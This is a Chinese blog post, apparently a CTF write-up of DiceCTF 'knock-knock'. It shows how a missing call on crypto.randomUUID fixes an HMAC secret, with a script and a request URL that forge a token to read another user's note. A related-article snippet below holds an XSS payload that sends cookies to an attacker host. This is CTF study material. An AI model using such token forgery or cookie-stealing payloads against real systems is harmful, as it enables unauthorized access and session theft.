DiceCTF - knock-knock

最新推荐文章于 2023-03-30 01:05:09 发布
最新推荐文章于 2023-03-30 01:05:09 发布
阅读量177 收藏
点赞数 1
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53263789/article/details/122819678
版权

一道nodejs题目,给了源码和dockerfile,从dockerfile知道nodejs版本为17.4.0,一个pastebin



返回可以进行xss,但是不会返回cookie,所以,审计一下代码

代码逻辑很简单flag在notes[0]位置上,但是由于每个人返回的token不相同,所以想要伪造token切换到id=0看似不可能

可以发现token生成的主要逻辑是依靠两个部分

this.secret = `secret-${crypto.randomUUID}`;
和
return crypto.createHmac('sha256',this.secret).update(id.toString()).digest('hex');

当我想要使用我的nodejs14尝试生成一下secret时发现了异常

于是就去找到了17版本的在线网站,发现了漏洞,nodejs-online

randomUUID缺少()导致this.secret为固定,这也就给了伪造token的机会

所以就可以进行伪造token

const crypto = require('crypto');
let secret = `secret-${crypto.randomUUID}`;
let id = 0;
console.log(crypto.createHmac('sha256', secret).update(id.toString()).digest('hex'));

另一种手动的方法
将错误信息base64编码

console.log(btoa(`secret-${crypto.randomUUID}`));

生成

c2VjcmV0LWZ1bmN0aW9uIHJhbmRvbVVVSUQob3B0aW9ucykgewogIGlmIChvcHRpb25zICE9PSB1bmRlZmluZWQpCiAgICB2YWxpZGF0ZU9iamVjdChvcHRpb25zLCAnb3B0aW9ucycpOwogIGNvbnN0IHsKICAgIGRpc2FibGVFbnRyb3B5Q2FjaGUgPSBmYWxzZSwKICB9ID0gb3B0aW9ucyB8fCB7fTsKCiAgdmFsaWRhdGVCb29sZWFuKGRpc2FibGVFbnRyb3B5Q2FjaGUsICdvcHRpb25zLmRpc2FibGVFbnRyb3B5Q2FjaGUnKTsKCiAgcmV0dXJuIGRpc2FibGVFbnRyb3B5Q2FjaGUgPyBnZXRVbmJ1ZmZlcmVkVVVJRCgpIDogZ2V0QnVmZmVyZWRVVUlEKCk7Cn0=

利用 hmac 伪造token

访问

url/note?id=0&token=7bd881fe5b4dcc6cdafc3e86b4a70e07cfd12b821e09a81b976d451282f6e264

FLAG:dice{1_d00r_y0u_d00r_w3_a11_d00r_f0r_1_d00r}

Ff.cheng
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Knock-Knock-Client
05-11
从合作到唱片,以敲门结束! :thumbs_up_light_skin_tone: 在敲门 如果您正在寻找玩具项目 如果您正在寻找发展和就业研究 那些想问问题的人 随时访问我们,找到您需要的解决方案! :paperclip: 您的项目有麻烦吗? :paperclip: Team团队成员介绍 点击展开! 共同工作(SR) 选定项目的想法选择和发展概念设置 使用Figma初始创建WireFrame 使用Miro创建流程图 使用DBdiagram的架构草案 起草API 李俊熙 角色:团队负责人 位置:前端 堆栈:React,Hooks,React Router Dom,Axios,CKeditor,Illustrator,Photoshop 作品: [下午] 项目计划与情况管理 前端-后端意见协调和团队成员记录管理 1)UI规划与设计 使用Photoshop创建应用程序源和徽标 使用插图创建必要的资源 应用程序概念和UI设计 2)主页 布局设置和UI设计 内容策
ctf 个人赛总结
西部壮仔的博客
08-09 3123
1.web 1. 从题目上看这道题得想让我们做的是绕过is_numeric 函数和intval函数a2可以用16进制和科学计数法来绕过is_numeric函数,hash_hmac函数对数组加密返回为空,我们就可以控制这个函数,我们可以把这些代码拷贝下来算出hmac的值让hmac的值让hmac的值让a3=这个值绕过die函数最后的构造为?a1=[]=3$a2=1e9&ccb3fd8a1db...
2016 Boston Key Party CTF hmac-crc
ACdream
05-20 421
这种做法应该算是:选择密钥攻击http://mslc.ctf.su/wp/boston-key-party-ctf-2016-hmac-crc-crypto-5pts/HMAC–CRC(m,k)=(qm(x)⊕rm(x)k(x))modP(x),根据这个式子,当m不变时,qm(x)和rm(x)不变令k(x)=0,则有:HMAC–CRC(m,0) = (qm(x))modP(x),令k(x)=1,则...
BMZCTF file-vault详解 php反序列化利用姿势
u013797594的博客
07-14 399
BMZCTF file-vault详解 php反序列化利用姿势 题目: 打开题目是一个上传页面。 拿到题目第一步要做的就是信息收集,使用dirsearch扫描一下敏感信息,发现存在一个index.php~文件,这是vim编辑器自动生成的备份文件,打开就是这道题的源码了 <?php error_reporting(0); include('secret.php'); $sandbox_dir = 'sandbox/'.sha1($_SERVER['REMOTE_ADDR']); global $
CTF-加密与解密(六)
→_→
08-07 4383
声明:以下CTF题均来自网上收集,在这里主要是给新手们涨涨见识,仅供参考而已。需要题目数据包的请私信或在下方留言。 11.Hash还原 (来源:网络) 1.关卡描述 小明一直将电脑密码的Hash值写在标签纸上,结果一不小心墨水撒到了上面,只能看到前十位是c2979c7124,另外小明记得他的密码是4位的数字加字母,你能帮小明恢复密码的Hash值吗?(密码的Hash值即为Flag值) 2.解题步骤 2.1 通过分...
CTF编码方式
w的博客
09-08 2524
CTF编码方式 base家族编码 base16 / base32 / base64 / base58 / base85 / base 100 (另附不常见的 base 36 / base62 / base92 加解密) 简述: **Base16编码是将二进制文件转换成由16个字符组成的文本 ** base32的编码表是由(A-Z、2-7)32个可见字符构成,“=”符号用作后缀填充。 base64的编码表是由(A-Z、a-z、0-9、+、/)64个可见字符构成,“=”符号用作后缀填充。 base58的编
CTF竞赛进阶 (一) 密码学
single7_的博客
11-21 3950
0x01 概述 Crypto 相比于 web 和 pwn,更考验参赛者的基础知识,对数学能力、逻辑思维能力与分析能力都有很高的要求。 密码学题目多种多样,包括但不限于: 通过密文分析明文 缺陷自定义密码体制分析解密文 加/解密机交互接口,利用弱点来泄露某些敏感信息 0x02 编码 0x02a 概念 字符编码(英语:Character encoding)、字集码是把字符集中的字符编码为指定集合中某一对象(例如:比特模式、自然数序列、8位组或者电脉冲),以便文本在计算机中存储和通过通信网络的传递。常见的例子
CTF常见编码及加解密(超全)
RuoLi_s的博客
11-19 1万+
title: CTF常见编码(超全) author: ruoli tags: ctf 编码 密码 安全 categories: MISC summary: 这是整理的最全的ctf常见加解密,以及编码,不看后悔!! abbrlink: a36c date: 2020-11-18 08:32:39 前言 ​ 最近打了场ctf,真的是被各种编码以及加密方式给搞怕了,所以,今天就来整理一下ctf中常见的编码,顺便给这次比赛做一个总结。 常见CTF编码及加解密 补充 计算机中的数据都是按字节存储。一个字节(.
[DiceCTF 2022] interview-opportunity
fa1c4的blog
04-18 518
interview-opportunity int __cdecl main(int argc, const char **argv, const char **envp) { char buf[10]; // [rsp+6h] [rbp-1Ah] BYREF const char **v5; // [rsp+10h] [rbp-10h] int v6; // [rsp+1Ch] [rbp-4h] v6 = argc; v5 = argv; env_setup(argc, arg
VNCTF2022 web wp
Je3Z的博客
02-13 1万+
GameV4.0 js/data.js下有段FLAG的base64加密 Vk5DVEYlN0JXZWxjb21lX3RvX1ZOQ1RGMjAyMiU3RA== 解码就行 VNCTF{Welcome_to_VNCTF2022} gocalc0 是个xss,没有过滤,前几次一直不行,session解密木得flag,不知道最后怎么又可以了,www <script>window.open('http://ip:7777/'+document.cookie)</script> 然后把ses
knock-knock
03-26
Create React App入门 该项目是通过引导的。 可用脚本 在项目目录中,可以运行: npm start 在开发模式下运行该应用程序。 打开在浏览器中查看它。 如果您进行编辑,则页面将重新加载。 您还将在控制台中看到任何...
Laravel开发-knock
08-28
Laravel开发-knock 使用安全标记为Laravel应用程序提供基于角色的应用程序权限
knock-factor
07-13
无需从口袋中取出手机,即可登录 2 因素身份验证站点。 敲击您的手机两次,我们的 Chrome 扩展程序会自动填写任何 2 因素身份验证代码。 这是的 2 因素身份验证。
double-knock-out-tournament
05-25
双淘汰赛 Web应用程序,用于通过与几个人进行的“双淘汰赛”来确定优先级。 如果您只想单独确定优先级,也可以使用。
30余种加密编码&杂项CTF
weixin_54882883的博客
05-05 2924
知识点: 存储密码加密-Web&数据库&系统 传输数据编码-各类组合传输参数值 代码特性加密-JS&PHP&NET&JAVA 数据显示编码-字符串数据显示编码 必须知道【你要懂噢】 加密编码进制在安全测试中有哪些存在 在我们数据库存储用户的信息中密码他有一个MD5加密 在我们电脑ip中有这2进制10进制16进制等的转换 在我们CTF中有这更为广泛的应用加密编码进行 必须知道其中百分之60以上 1. 有哪些常见的进制编码加密方式 凯撒加密,摩斯密码,猪
JWT认证漏洞总结
渗透测试研究中心
09-16 2055
通过对众多靶场案例漏洞测试,其中弱密钥、密钥泄露、不校验签名、信息泄露这些问题出现的居多,像更改 Header 不使用签名,暂时在实际生产环境中没遇到过。测试方面遇到 JWT可利用 jwt-tools 工具进行测试,将所有已知漏洞都测试一遍,避免遗漏。密钥。
识别密文加密方式:base、Unicode、escape、URL/HEX、md5、sha、hmac、rsa、PBKDF2、aes、sm、js混淆
freeking101的博客
03-30 5322
爬虫工程师在做加密参数逆向的时候,经常会遇到各种各样的加密算法、编码、混淆,每个算法都有其对应的特征,对于一些较小的网站,往往直接引用这些官方算法,没有进行魔改等其他操作,这种情况下,如果我们能熟悉常见算法的特征,通过密文就能猜测出使用的哪种算法、编码、混淆,将会大大提高工作效率!在 CTF 中通常也会有密码类的题目,掌握一些常见密文特征也是 CTFer 们必备的技能!编码:Base 系列、Unicode、Escape、URL、Hex;
ctf从入门到放弃:token 与 csrf 的防范190514
爱党人士
05-15 1962
Token是如何防止CSRF的? CSRF的主要问题是敏感操作的链接容易被伪造,那么如何让这个链接不容易被伪造? -每次请求,都增加一个随机码(需要够随机,不容易伪造),后台每次对这个随机码进行验证! 用bp抓包,post型的: CSRF(token)项目的token生成代码: 有两点注意: 1.要生成新的 2.销毁旧的 最后,在后台有个这样的判断: $_GET[]= $_SESSION[] ...
网络安全实验室CTF练习部分题目(持续更新)
热门推荐
技术学习人生
06-29 8万+
1、脚本关:微笑一下,过关地址:http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/index.php 查看源代码: include('flag.php'); $smile = 1; if (!isset ($_GET['^_^'])) $smile = 0; if (preg_match
恶意程序-分析SYNful Knock 思科植入
最新发布
05-20
SYNful Knock 是一种恶意软件,它被植入思科网络设备中,在未被授权的情况下修改其固件,以便攻击者可以在设备上执行恶意代码并获取敏感数据。以下是对 SYNful Knock 的分析: 1. 攻击方式 攻击者利用设备的漏洞或...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值